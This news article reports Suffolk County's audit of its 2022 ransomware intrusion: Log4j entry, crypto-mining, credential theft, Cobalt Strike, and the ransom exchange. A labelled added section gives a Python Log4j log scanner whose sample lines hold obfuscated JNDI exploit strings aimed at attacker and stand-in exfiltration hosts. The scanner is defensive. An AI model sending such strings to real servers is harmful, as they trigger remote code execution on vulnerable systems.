
Suffolk Hackers Communicated Up To Month After Cyberattack: Bellone

In a message that claimed to be a cybersecurity study, the hackers threatened the destruction of systems and discomfort for residents, the county executive says.

Suffolk County Executive Steve Bellone announced the completion of the probe into the Sept. 8 cyberattack on Wednesday. (Suffolk County)

HAUPPAUGE, NY — Suffolk officials kept closely guarded the fact that, for up to a month afterward, they were still receiving communications from the cybercriminals believed to be responsible for the Sept. 8 attack that brought county government to a standstill, County Executive Steve Bellone revealed on Wednesday.

In one communication, the "threat actors" claimed to be conducting a cybersecurity study that had found a vulnerability that could lead to "the destruction of systems" and "discomfort" for Suffolk residents, he told reporters at a news conference in Hauppauge announcing the completion of the forensic audit into the hacking.

The findings of the audit have been provided to a committee of county legislators who are probing the event, as well as local and federal law enforcement authorities.


Bellone, who refused to pay the hackers' ransom back in the fall, said they accused him of acting irrationally and told him the disruption could have been avoided.

He has previously said that he turned them down because he was unsure whether the payment would suffice, and because he questioned what a criminal enterprise would use the funds for.


"It's not the first time that I have been accused of acting irrationally by bad actors since becoming bad actors," he said.

One of the audit's findings, according to Bellone, is that it vindicated earlier advice to limit public communications: the hackers were following media reports and scouring them for details to use as leverage.

One media report put the amount Suffolk had spent on cybersecurity since 2019 at $6.5 million, and it is believed that figure is how the hackers arrived at their $2.5 million ransom demand, Bellone said.

The audit contained a detailed review of the intrusion, including how the hackers initially gained access to the county clerk's office through a Log4j vulnerability in 2021, then established a bitcoin-mining operation, harvested important county credentials, and took an iron key folder containing passwords from the clerk's network.

It detailed how they established a fake account in the name of former IT commissioner Christopher Naples, who was charged in connection with running a Bitcoin operation out of the clerk's office in 2021. It also determined how the hackers used the clerk's office domain, which was separate from the rest of the county's network, to conduct reconnaissance within the county's systems before finally migrating there on Aug. 20, 2022.

In that timeframe, evidence of a Cobalt Strike beacon and other malicious tools was found.

On Aug. 31, the hackers set up a "reverse private tunnel connection" between their own infrastructure and the county clerk's office.
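The audit summary above names a Log4j vulnerability as the initial access vector. As an added example, not part of the Patch article or of the county's audit, the following Python scans web-server log lines for the JNDI lookup strings that Log4j exploitation attempts carry, including URL-encoded forms and the case-conversion and default-value obfuscations (`${lower:j}`, `${::-d}`, `${env:X:-i}`) commonly used to evade naive string matching. The log lines are constructed for illustration with TEST-NET addresses and do not come from the Suffolk incident.

```python
import re
import urllib.parse
from dataclasses import dataclass

# Constructed sample access-log lines (not from the Suffolk audit).
SAMPLE_LOGS = [
    # benign request
    '10.0.0.5 - - [08/Sep/2022:03:14:07 -0400] "GET /clerk/search?name=smith HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain JNDI lookup in the User-Agent header
    '198.51.100.23 - - [08/Sep/2022:03:14:09 -0400] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    # obfuscated with lower/upper and default-value lookups
    '198.51.100.23 - - [08/Sep/2022:03:14:11 -0400] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:rmi}://198.51.100.23:1099/obj}"',
    # URL-encoded lookup in the query string
    '198.51.100.23 - - [08/Sep/2022:03:14:13 -0400] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example.test%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    # a Log4j lookup that is not JNDI (must not alert)
    '10.0.0.7 - - [08/Sep/2022:03:15:00 -0400] "GET /?msg=${date:yyyy} HTTP/1.1" 200 10 "-" "test"',
]

# ${lower:x} / ${upper:x} resolve to x (case is normalised at the end anyway).
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}$]*)\}", re.IGNORECASE)
# ${anything:-x} resolves to its default value x, e.g. ${::-j} or ${env:NOPE:-j}.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}$]*:-([^{}$]*)\}")
# The final, de-obfuscated lookup we actually alert on.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:\s*//\s*([^}\s]+)",
    re.IGNORECASE,
)


def url_decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads surface."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def normalize(s: str, max_rounds: int = 10) -> str:
    """Decode, then collapse nested lookup obfuscation inside-out until stable."""
    s = url_decode(s)
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s.lower()


@dataclass
class Alert:
    line_no: int
    protocol: str   # ldap, rmi, dns, ...
    target: str     # host:port/path the victim would be made to contact
    raw: str        # the original log line, for the analyst


def scan(lines) -> list:
    """Return one Alert per JNDI lookup found after normalisation."""
    alerts = []
    for i, line in enumerate(lines, 1):
        for m in _JNDI.finditer(normalize(line)):
            alerts.append(Alert(i, m.group(1), m.group(2), line))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOGS):
        print(f"line {a.line_no}: jndi:{a.protocol} -> {a.target}")
```

The normalisation step is what matters: matching `${jndi:` literally catches only the least careful scanners, while resolving `lower`/`upper` and `:-` default lookups before matching catches the variants seen in the wild. Bounding every loop keeps the scanner safe against a log line crafted to make it spin.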

In the wake of the attack, Suffolk officials shut down the government's web-based applications.

It was later determined that the driver's license numbers of nearly 500,000 people who had been issued violations in the county's police district (the area patrolled by Suffolk police, outside villages) may have been exposed, along with the personal information of current and former employees.

In December, Bellone said that his office had been stymied by the county clerk's segregated IT system.

He now says he regrets not making "a stronger push to end the segregated structure," because a centralized system would have made information sharing easier and could have thwarted the attack, he said.

Several measures could have helped prevent the attack or stopped it from progressing, according to Bellone, such as the VxRail security infrastructure first authorized in 2019 and the security operations center the county launched in February 2022.

If the clerk's office had agreed to participate in the security operations center, that might have enabled the kind of information sharing that could have stopped the attack, he said.

Creating a chief information security officer position sooner, despite the pandemic, could also have helped, Bellone said.

"If we had a chief information security officer in place with security authority across the entire network, then that could have changed the outcome here as well," he said.

Former County Clerk Judith Pascale reportedly requested additional security measures, but was denied.

Her IT director, Peter Schlussler, who was placed on paid leave last year, denied doing anything wrong, according to published reports.

He told The Wall Street Journal in an emailed statement that warnings from the Federal Bureau of Investigation about attack indicators were sent to Suffolk but were not acted on, and that his office attempted to buy a firewall from Palo Alto Networks in June, but the request was blocked.

